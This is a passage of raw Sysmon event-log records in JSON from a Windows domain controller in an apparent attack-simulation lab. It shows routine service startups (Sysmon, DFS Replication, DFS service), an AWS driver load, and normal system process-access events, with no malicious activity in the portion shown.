C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.872","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001014BB0200}","TargetProcessId":"2688","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1229,"ProcessID":2740,"ThreadID":3448,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:26.422\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xeniface.sys\r\nHashes: MD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9A\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 05:46:26.422","ImageLoaded":"C:\\Windows\\System32\\drivers\\xeniface.sys","Hashes":"MD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9A","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.842\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nProcessId: 2740\r\nImage: C:\\Windows\\sysmon64.exe\r\nFileVersion: 10.42\r\nDescription: System activity monitor\r\nProduct: Sysinternals Sysmon\r\nCompany: Sysinternals - www.sysinternals.com\r\nOriginalFileName: ?\r\nCommandLine: C:\\Windows\\sysmon64.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=384B6FC04A512CFE7A4E628942867D95,SHA256=80B110B91730729BE60C7D79C55FFF0EC893FD4CFB5F44D04C433EE8E95C5E20,IMPHASH=30777134873A03E5D01D04EDE5BEC51E\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.842","ProcessGuid":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","Image":"C:\\Windows\\sysmon64.exe","FileVersion":"10.42","Description":"System activity monitor","Product":"Sysinternals Sysmon","Company":"Sysinternals - www.sysinternals.com","OriginalFileName":"?","CommandLine":"C:\\Windows\\sysmon64.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=384B6FC04A512CFE7A4E628942867D95,SHA256=80B110B91730729BE60C7D79C55FFF0EC893FD4CFB5F44D04C433EE8E95C5E20,IMPHASH=30777134873A03E5D01D04EDE5BEC51E","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.873\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2556\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.873","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"2556","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.873\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.873","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.828\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nProcessId: 2804\r\nImage: C:\\Windows\\System32\\dfsrs.exe\r\nFileVersion: 10.0.14393.2879 (rs1_release_inmarket.190313-1855)\r\nDescription: Distributed File System Replication\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dfsr.exe\r\nCommandLine: C:\\Windows\\system32\\DFSRs.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.828","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001095B80200}","Image":"C:\\Windows\\System32\\dfsrs.exe","FileVersion":"10.0.14393.2879 (rs1_release_inmarket.190313-1855)","Description":"Distributed File System Replication","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dfsr.exe","CommandLine":"C:\\Windows\\system32\\DFSRs.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.879\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.879","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.879\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.879","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.876\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010A4C10200}\r\nProcessId: 1980\r\nImage: C:\\Windows\\System32\\dfssvc.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows NT Distributed File System Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dfssvc.exe\r\nCommandLine: C:\\Windows\\system32\\dfssvc.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.876","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010A4C10200}","Image":"C:\\Windows\\System32\\dfssvc.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows NT Distributed File System Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dfssvc.exe","CommandLine":"C:\\Windows\\system32\\dfssvc.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.888\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A4C10200}\r\nTargetProcessId: 1980\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.888","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A4C10200}","TargetProcessId":"1980","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.888\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A4C10200}\r\nTargetProcessId: 1980\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.888","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A4C10200}","TargetProcessId":"1980","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.890\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 924\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nTargetProcessId: 2688\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 